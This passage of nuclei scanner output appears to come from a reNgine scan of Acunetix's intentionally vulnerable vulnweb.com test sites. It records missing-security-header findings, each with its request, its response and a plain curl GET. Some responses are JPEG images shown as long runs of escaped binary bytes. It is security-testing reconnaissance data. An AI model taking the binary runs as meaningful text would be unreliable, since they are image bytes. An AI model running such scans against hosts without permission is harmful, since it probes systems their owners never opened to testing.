ffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 \\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:40.596081282Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:40.596156949Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:40.596177144Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn 